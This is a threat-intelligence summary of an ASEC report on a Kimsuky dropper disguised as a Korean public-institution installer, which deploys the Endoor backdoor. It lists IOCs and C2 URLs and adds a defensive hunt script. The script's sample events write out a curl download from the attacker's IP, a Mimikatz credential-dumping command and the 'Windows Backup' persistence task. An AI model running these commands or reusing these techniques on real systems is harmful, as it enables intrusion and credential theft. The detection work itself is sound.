Malware Disguised as Installer from Korean Public Institution (Kimsuky Group) – ASEC BLOG

AhnLab ASEC found a dropper impersonating a Korean public institution installer that extracts an embedded archive (src.rar) using WinRAR and a hardcoded password to deploy the Endoor backdoor. Endoor, written in Go and signed with the same certificate as previous Kimsuky activity, persists via a scheduled task, contacts C2 domains (ngrok-free[.]app / minish.wiki[.]gd), and is used alongside tools like Mimikatz and a screenshot stealer. #Endoor #Kimsuky

Keypoints

  • Kimsuky-distributed dropper masquerades as an installer from a Korean public institution (uses institution logo and fabricated version info).
  • Dropper contains WinRAR as “unrar.exe” and a compressed payload “src.rar” decrypted with password “1q2w3e4r” to deploy the Endoor backdoor.
  • Endoor is an obfuscated Golang backdoor; on installation it copies itself to %USERPROFILE%\svchost.exe (a name chosen to blend in with the legitimate System32 binary) and creates a Task Scheduler entry named “Windows Backup” for persistence.
  • Endoor communicates with C2 servers hosted on ngrok-free[.]app and minish.wiki[.]gd and can download or update additional binaries (e.g., fetching a payload with curl and saving it as rdpclip.dat).
  • Post-compromise activity includes credential dumping with Mimikatz (staged as %ALLUSERSPROFILE%\cache.exe) and a screenshot stealer built from Kbinani’s library that posts captures to a loopback endpoint (127.0.0.1:8080), i.e., through a local proxy the actor installed.
  • Nikidoor, another Kimsuky backdoor, shares C2 infrastructure and was also observed in related campaigns.
  • Several artifacts are signed with a legitimate Korean company certificate, aiding defense evasion; AhnLab provided MD5 hashes, C2 URLs, and download locations for detection.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Used to deliver the dropper disguised as an installer (‘the dropper was disguised as an installer for a certain public institution in South Korea.’)
  • [T1204] User Execution – Relies on user running the fake installer for initial execution (‘the malware is the only program that is installed in a normal way.’)
  • [T1059] Command and Scripting Interpreter – Used curl/command-line to download additional payloads (‘downloaded from an external source using Curl, under the name “rdpclip.dat”.’)
  • [T1036] Masquerading – Dropper uses institution logo, forged version info, and installer UI to appear legitimate (‘used the logo of the institution for its icon, and relevant keywords could be found in the version information and setup page.’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Endoor registers a scheduled task named “Windows Backup” for persistence (‘registers itself to the Task Scheduler under the name “Windows Backup”.’)
  • [T1027] Obfuscated Files or Information – Payloads are obfuscated and embedded (Go obfuscation, embedded WinRAR and compressed archive) (‘The backdoor is developed in Golang and is obfuscated’ and uses a compressed file src.rar with a password.)
  • [T1553.002] Subvert Trust Controls: Code Signing – Dropper and related binaries are signed with a valid Korean company certificate to evade detection (‘signed with a valid certificate from a Korean company.’) Note: T1078 Valid Accounts, which covers stolen credentials rather than certificates, does not apply here.
  • [T1003.001] OS Credential Dumping: LSASS Memory – Mimikatz was used to extract credentials (‘installed Mimikatz … and the argument “sekurlsa::logonpasswords” was identified in the execution logs’)
  • [T1113] Screen Capture – A screenshot-taking component was deployed to collect screen images using Kbinani’s library (‘captures and exfiltrates screenshots … created using Kbinani’s screenshot library’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Backdoor communicates with C2 servers over HTTP/HTTPS (‘Endoor’s C&C communications packet’ and C2 URLs on ngrok-free[.]app/minish.wiki[.]gd)
  • [T1090] Proxy – The screenshot stealer posts to a loopback address (127.0.0.1:8080) rather than to an external host, so a separately installed proxy must relay the traffic onward (‘the exfiltration address is a local host (“hxxp://127.0.0.1:8080/recv”).’) The report does not identify the relay, so the sub-technique (internal vs. external proxy) cannot be determined from the page.
  • [T1567] Exfiltration Over Web Service – Screenshots are exfiltrated over HTTP to the loopback proxy endpoint, which implies chained exfiltration to external infrastructure (‘exfiltration address is a local host … may signify that the threat actor already installed a proxy’)

Indicators of Compromise

  • [MD5 hashes] samples – b74efd8470206a20175d723c14c2e872 (dropper, signed *App.exe), 7034268d1c52539ea0cd48fd33ae43c4 (Endoor svchost.exe), and 3 more hashes.
  • [C2 URLs] command-and-control domains – https://real-joey-nicely.ngrok-free[.]app/mir/index.php, http://minish.wiki[.]gd/index.php (also used by Nikidoor).
  • [Download URLs] additional payload sources – hxxp://210.16.120[.]210/rdpclip.dat (presumed Endoor), hxxp://minish.wiki[.]gd/eng.db (Endoor variant).
  • [File names / paths] deployment and tools – src.rar / unrar.exe (embedded archive and decompressor), %USERPROFILE%\svchost.exe (Endoor install path), %ALLUSERSPROFILE%\cache.exe (Mimikatz), rdpclip.dat (downloaded payload).

The infection chain begins with a dropper crafted to resemble an installer from a Korean public institution: it carries the institution’s logo and fabricated version information, and embeds WinRAR’s extractor as unrar.exe together with a password-protected archive, src.rar, whose hardcoded password is “1q2w3e4r”. When run, the dropper invokes unrar.exe to extract the archive and then executes its contents: the obfuscated, Go-based backdoor known as Endoor.

When launched with the “install” argument, Endoor copies itself to %USERPROFILE%\svchost.exe and registers a scheduled task named “Windows Backup” that runs the copy with the “backup” argument, which is how it survives reboots. The backdoor uses HTTP-based C2 channels (observed on ngrok-free[.]app and minish.wiki[.]gd), can download additional binaries via curl (e.g., rdpclip.dat from 210.16.120[.]210), and supports command execution, file transfer, process manipulation, and operation as a SOCKS5 proxy.

Post-compromise activity includes credential dumping with Mimikatz (staged at %ALLUSERSPROFILE%\cache.exe and run with the “sekurlsa::logonpasswords” module) and a screenshot grabber built from the Kbinani library that posts captures to a loopback endpoint (http://127.0.0.1:8080/recv), which implies a locally installed proxy forwards the data to external infrastructure. Multiple artifacts were signed with a valid Korean company certificate; MD5 hashes, C2 URLs, and download locations were published for detection and blocking.
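The chain above leaves a distinctive trail in endpoint telemetry: an unrar.exe run with a -p password switch, a svchost.exe executing outside System32, a “Windows Backup” task whose action is that rogue svchost.exe, a curl download saved as a .dat file, a sekurlsa::logonpasswords command line, connections to the reported C2 domains, and a loopback POST target on port 8080. The following hunt script is an added example (it is not code from ASEC’s report or from the malware) that encodes those observations as rules over a simplified, Sysmon-style event model. The Event fields and the sample events are constructed for illustration; in practice they would be populated from Sysmon events 1 (process creation), 3 (network connection) and Security event 4698 (scheduled task created).

```python
"""Hunt rules for the Endoor dropper chain described in the ASEC report.

Added example. The Event schema and SAMPLE_EVENTS below are constructed
stand-ins for normalized Sysmon/Security telemetry, not real captures.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str              # "process" | "task" | "netconn"
    image: str = ""        # full path of the executing binary
    cmdline: str = ""      # process command line (process events)
    task_name: str = ""    # scheduled task name (task events)
    task_action: str = ""  # command the scheduled task runs (task events)
    dest: str = ""         # host:port of the outbound connection (netconn events)


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
IOC_DOMAINS = ("ngrok-free.app", "minish.wiki.gd")   # C2 domains from the report


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _exe_of(cmd: str) -> str:
    """First token of a command line, honouring a quoted executable path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd.split('"')[1]
    return cmd.split()[0] if cmd else ""


def _outside_system_dirs(path: str) -> bool:
    return not any(path.lower().startswith(d) for d in SYSTEM_DIRS)


# Endoor installs as %USERPROFILE%\svchost.exe; the real one lives in System32/SysWOW64.
def rule_svchost_masquerade(ev: Event) -> bool:
    return ev.kind == "process" and _basename(ev.image) == "svchost.exe" \
        and _outside_system_dirs(ev.image)


# Persistence: task "Windows Backup" whose action is a svchost.exe outside the system dirs.
def rule_backup_task(ev: Event) -> bool:
    if ev.kind != "task" or ev.task_name.lower() != "windows backup":
        return False
    exe = _exe_of(ev.task_action)
    return _basename(exe) == "svchost.exe" and _outside_system_dirs(exe)


# Dropper stage: unrar.exe launched with an inline password (-p<password>).
def rule_unrar_with_password(ev: Event) -> bool:
    return ev.kind == "process" and _basename(ev.image) == "unrar.exe" \
        and re.search(r"(?:^|\s)-p\S+", ev.cmdline) is not None


# Payload staging: curl writing its download to a .dat file (rdpclip.dat in the report).
def rule_curl_staging(ev: Event) -> bool:
    return ev.kind == "process" and _basename(ev.image) == "curl.exe" \
        and re.search(r"(?:^|\s)(?:-o|--output)\s+\S+\.dat\b", ev.cmdline, re.I) is not None


# Credential dumping: the Mimikatz module seen in the execution logs.
def rule_mimikatz_args(ev: Event) -> bool:
    return ev.kind == "process" and "sekurlsa::logonpasswords" in ev.cmdline.lower()


# C2: any connection to the reported domains (or their subdomains).
def rule_c2_domain(ev: Event) -> bool:
    host = ev.dest.lower().rsplit(":", 1)[0]
    return ev.kind == "netconn" and any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


# Exfil relay: the screenshot stealer posts to 127.0.0.1:8080; low fidelity on its own,
# so correlate with whatever process is listening on that port.
def rule_loopback_relay(ev: Event) -> bool:
    return ev.kind == "netconn" and ev.dest == "127.0.0.1:8080"


RULES = {f.__name__: f for f in (
    rule_svchost_masquerade, rule_backup_task, rule_unrar_with_password,
    rule_curl_staging, rule_mimikatz_args, rule_c2_domain, rule_loopback_relay)}


def hunt(events):
    """Return (rule_name, event) pairs for every rule that fires."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


def hit_names(events):
    return sorted({name for name, _ in hunt(events)})


# Constructed sample telemetry: one event per stage of the reported chain, plus benign noise.
SAMPLE_EVENTS = [
    Event("process", r"C:\Users\alice\AppData\Local\Temp\unrar.exe",
          cmdline="unrar.exe x -p1q2w3e4r src.rar"),
    Event("process", r"C:\Users\alice\svchost.exe",
          cmdline=r'"C:\Users\alice\svchost.exe" install'),
    Event("task", task_name="Windows Backup", task_action=r'"C:\Users\alice\svchost.exe" backup'),
    Event("process", r"C:\Windows\System32\curl.exe",
          cmdline="curl.exe -o rdpclip.dat http://210.16.120.210/rdpclip.dat"),
    Event("process", r"C:\ProgramData\cache.exe",
          cmdline='cache.exe "sekurlsa::logonpasswords" exit'),
    Event("netconn", r"C:\Users\alice\svchost.exe", dest="real-joey-nicely.ngrok-free.app:443"),
    Event("netconn", r"C:\Users\alice\AppData\Roaming\shot.exe", dest="127.0.0.1:8080"),
    # benign: the real svchost, a Microsoft task, an ordinary outbound connection
    Event("process", r"C:\Windows\System32\svchost.exe", cmdline="svchost.exe -k netsvcs"),
    Event("task", task_name="Windows Backup", task_action=r"C:\Windows\System32\sdclt.exe"),
    Event("netconn", r"C:\Windows\System32\svchost.exe", dest="update.microsoft.com:443"),
]

if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"{name}: {ev.image or ev.task_action or ev.dest}")
```

Each rule fires exactly once on the constructed sample and not on the benign events; the loopback rule is deliberately the weakest and is only a lead until the listener on 8080 is identified.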

Read more: https://asec.ahnlab.com/en/63396/